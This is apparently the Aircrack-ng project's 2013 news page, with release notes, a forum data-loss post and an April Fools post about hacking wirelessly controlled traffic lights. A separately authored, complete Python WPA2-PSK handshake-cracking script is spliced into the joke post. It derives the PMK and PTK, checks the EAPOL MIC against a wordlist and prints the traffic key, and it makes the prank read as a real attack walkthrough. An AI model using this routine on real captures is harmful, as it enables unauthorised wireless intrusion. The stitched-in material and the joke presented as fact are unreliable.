Saturday, November 30, 2013

Aircrack-ng 1.2 Beta 2 release

Here is a second beta. Enjoy it ;)

Release Notes:
  • Airbase-ng IE order fixed
  • Improved WEP cracking speed using PTW
  • Fixed WPA capture decryption when WMM is used
  • Fixed memory leaks in several parts of the suite
  • Fixed compilation with recent version of gcc, on cygwin and on Gentoo hardened
  • Now using Coverity Scan for static code analysis
  • Lots of other small fixes

Detailed changelog:
  • Airbase-ng: Fixed order of IE when creating soft Access Point.
  • Airbase-ng: Fixed Caffe Latte Attack not working for all clients.
  • Aircrack-ng: Improved PTW speed thanks to Ramiro Polla.
  • Airmon-zc: Fixed improper use of the interface.
  • Airdecap-ng: Fixed decoding captures with WMM enabled.
  • Various: Fixed memory leaks in Aircrack-ng, Aireplay-ng, OSdep.
  • Added support for static analysis using Coverity Scan.
  • Fixed compilation due to PIC unfriendly assembly on Gentoo hardened.
  • Fixed running tests using 'make check'.
  • Fixed building aircrack-ng with recent version of gcc and also on cygwin.
  • Various other small fixes.

Saturday, May 25, 2013

Aircrack-ng 1.2 Beta 1 Release

After a few years, we finally got a release: 1.2 Beta 1. Enjoy ;-)

Release summary:
  • Compilation fixes on all supported OSes.
  • Makefile improvement and fixes.
  • A lot of fixes and improvements on all tools and documentation.
  • Fixed licensing issues.
  • Added a few new tools and scripts (including distributed cracking tool).
  • Fixed endianness and QoS issues.

You can find more details in the ChangeLog and even more in our subversion history.

And, 2 more things:
  • The forum will be ready in a few days.
  • We are now using Travis CI for continuous integration.

Monday, May 20, 2013

Trac migration and forum crash details


You probably didn't notice but I had been working a lot on the servers and I recently migrated our old trac server to a new server.

However, a migration never goes without a glitch (who unleashed Murphy?). A few settings changes need to be done for Trac and we're done, but SVN wasn't behaving. The only solution I saw was moving it temporarily to a separate server/URL:
You can also reach it via HTTPS, but it's a self-signed certificate for now.
Since the repository UUID didn't change, you can simply relocate your local copy or check out with the new SVN URL.

The Trac URL didn't change, and it is now also available via HTTPS with a proper certificate.


The forum had a big issue a few weeks ago. My provider told me their logs say the instance was stopped. However, their cloud system crashed the instance.

The non-persistent disk where the OS of the instance is installed goes back to its original state (so any data/customization on that disk is lost) when the VM is stopped or archived. I already had similar issues before, but I was able to force the instance to reboot, so it wasn't a big deal.

Forum data is hosted in a MySQL database, and those files were on the non-persistent disk.

Good news: forum files and the Apache config were stored on the persistent disk, and I had a backup script for the DB.
Bad news: the last time the backup script ran was in July 2012.
Lesson learned: check every so often that the backup scripts are still running.

We lost about 10 months of posts, and I am deeply sorry for what happened. I had a discussion with my provider and I'm now downsizing due to that issue, past issues and their customer support. I'll only keep the stuff that never gave me any issue: domains.
Trac was the first service to be migrated to the new server a very good friend gave me (I can't thank him enough for that). Other services will be moved on that server too.

Monday, April 1, 2013

April Fools - Wirelessly controlled traffic light

Hello guys,

Some time ago, a person who shall not be named emailed me and talked about new traffic lights that can be controlled wirelessly. Since access points are getting pretty powerful these days, it makes sense that they are now embedded in traffic lights to control them. The reason behind making it wirelessly accessible is to make maintenance easier for technicians so that they don't have to open the whole thing. They just have to connect to the AP inside the traffic light to do it.

Here is the maintenance page. The URL of that page is blurred for security reasons:

Since there is no reference to it on other pages and it's so basic, I guess they forgot to remove it on production units (or maybe it is just meant to be used by technicians/developers, or it is security by obscurity). On other pages you can input parameters of the traffic light when it is in automatic mode, such as operating times (it will blink yellow outside of them), how long each light lasts, etc.

He even sent me one of those traffic lights. As a side note, you would be amazed by the size of those things:

Here is a close-up where the AP is:

The network cable you can see is used to interconnect different traffic lights at crossroads to synchronize several of them. 

Well, of course, since they don't want people to just hack in and mess with the traffic lights, they did not make it easy to connect (SSID is random) and to find that page. However, the person who contacted me managed to grab the handshake while the maintenance guy was doing maintenance and apparently, they use the same easy passphrase ("Maintenance123") on ALL those new traffic lights. By decrypting the traffic, he figured out the page where you can control the traffic light manually.
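The chain described in that paragraph (capture the WPA2 4-way handshake, guess the shared passphrase offline, derive the session keys that let you decrypt the data frames) is what the following added example walks through. It is not code from the original post or from aircrack-ng; it is a stand-alone illustration of the IEEE 802.11i PSK key schedule in Python's standard library. Every value in it (the SSID, both MAC addresses, the nonces, the EAPOL message 2 frame and the candidate wordlist) is constructed here so the script runs offline; nothing is taken from a real capture.

```python
"""
Added example (not aircrack-ng code): WPA2-PSK handshake recovery.

PMK  = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
PTK  = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))
KCK  = PTK[0:16]   (keys the MIC on the EAPOL-Key frames)
TK   = PTK[32:48]  (the CCMP key that protects the data frames)

With the handshake captured, checking a candidate passphrase is just
"does the recomputed MIC of message 2 equal the captured one?".
"""
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK mapping: the SSID is the salt, so the PMK is per-network."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key; byte-wise min/max matches the spec's Min()/Max() on equal-length fields."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_msg2(snonce: bytes, replay_counter: int) -> bytes:
    """Minimal EAPOL-Key message 2 (RSN descriptor, key descriptor version 2) with the MIC field zeroed."""
    key_info = 0x010A                                             # Pairwise | MIC | descriptor version 2
    body = struct.pack(">BHHQ", 2, key_info, 0, replay_counter)   # descriptor type, key info, key length, replay ctr
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8     # SNonce, Key IV, Key RSC, Key ID
    body += b"\x00" * 16                                          # MIC placeholder (filled in by the supplicant)
    body += struct.pack(">H", 0)                                  # key data length (RSN IE omitted for brevity)
    return struct.pack(">BBH", 2, 3, len(body)) + body            # 802.1X header: version 2, type 3 = EAPOL-Key


def eapol_mic(kck: bytes, eapol: bytes, descriptor_version: int = 2) -> bytes:
    """MIC over the whole frame with its MIC field zeroed: HMAC-MD5 for v1 (TKIP), HMAC-SHA1 for v2 (CCMP)."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if descriptor_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def recover_passphrase(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """Offline dictionary check against the captured message 2; returns the matching passphrase or None."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_msg2), captured_mic):
            return candidate
    return None


# ---- constructed "capture": a stand-in for a real handshake, nothing below is real ----
SSID = "TL-7f3a9c"                                  # random-looking per-unit SSID, still visible in beacons
AP_MAC = bytes.fromhex("02a1b2c3d4e5")
STA_MAC = bytes.fromhex("02f6e5d4c3b2")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
TRUE_PASSPHRASE = "Maintenance123"                  # the shared passphrase from the post


def make_capture() -> bytes:
    """Act as the supplicant: fill in the MIC of message 2 with the real passphrase."""
    frame = build_eapol_msg2(SNONCE, replay_counter=1)
    ptk = derive_ptk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return frame[:MIC_OFFSET] + eapol_mic(ptk[:16], frame) + frame[MIC_OFFSET + 16:]


CAPTURED_MSG2 = make_capture()
WORDLIST = ["password", "admin123", "Maintenance123", "traffic2013"]  # constructed candidate list

if __name__ == "__main__":
    found = recover_passphrase(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST)
    print("recovered passphrase:", found)
    if found:
        ptk = derive_ptk(pmk_from_passphrase(found, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        print("TK for decrypting this session's CCMP frames:", ptk[32:48].hex())
```

Two points the code makes concrete. The SSID salts the PMK, so a random SSID per unit defeats precomputed tables for the network but does nothing against a passphrase that is shared across every unit: once "Maintenance123" is known, the PMK for any other light follows from its broadcast SSID, and the TK for each session from its captured handshake. And everything after the capture is offline; the only online step is being in range while a client (here, the maintenance technician) associates.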

We both tried to contact the company to let them know about the flaws since it's pretty unsafe/dangerous to be able to change the light on live traffic lights and especially since they use the same passphrase on all of them. But they never got back to us.